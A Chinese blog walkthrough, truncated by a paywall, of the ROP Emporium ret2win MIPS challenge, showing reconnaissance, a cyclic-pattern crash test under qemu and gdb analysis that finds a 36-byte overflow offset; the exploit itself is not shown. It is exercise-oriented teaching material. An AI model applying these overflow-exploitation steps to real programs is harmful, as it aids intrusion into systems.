ROP_Emporium_ret2win_mipsel

MIPS架构下ret2win漏洞利用分析与Exp开发

最新推荐文章于 2025-06-26 17:47:03 发布

原创

最新推荐文章于 2025-06-26 17:47:03 发布 · 404 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#bash #linux #gnu

本文介绍了针对MIPS架构的ret2win_mipsel程序进行的信息收集、黑盒测试及反汇编分析。通过ulimit设置、cyclic测试和gdb调试确定了程序崩溃偏移。在检查程序安全特性时发现存在栈溢出，但无 Canary保护，且NX启用。使用ida反汇编进一步理解函数布局，确定了payload构造的关键点。最终编写并展示了Exp来利用这个栈溢出漏洞，但由于找不到main函数返回地址，导致程序陷入无限循环。

文章目录

ret2win_mipsel

ret2win_mipsel

依赖：

sudo apt install qemu-mipsel-static gcc-mipsel-linux-gnu

信息收集

$ file ret2win_mipsel
ret2win_mipsel: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld.so.1, for GNU/Linux 3.2.0, BuildID[sha1]=cef0d672b72ee9c102ff2202072581aabafcb561, not stripped
$ checksec ret2win_mipsel
[*] '/home/starr/Documents/CProject/pwn/ret2win_mipsel'
    Arch:     mips64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE

这里checksec显示是64位程序，应该错了，，

黑盒测试

$ ulimit -c unlimited && sudo bash -c 'echo %e.core.%p > /proc/sys/kernel/core_pattern'
$ cyclic 200 > cyclic.txt
$ qemu-mipsel-static ./ret2win_mipsel < cyclic.txt
ret2win by ROP Emporium
MIPS

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> Thank you!
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault
$ gdb-multiarch ./ret2win_mipsel  qemu_ret2win_mipsel_20220506-203156_19548.core
...
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x6161616a in ?? ()
$ cyclic -l 0x6161616a
36

崩溃偏移位于36字节。

反汇编

$ mipsel-linux-gnu-objdump -d ret2win_mipsel

ret2win_mipsel:     file

最低0.47元/天解锁文章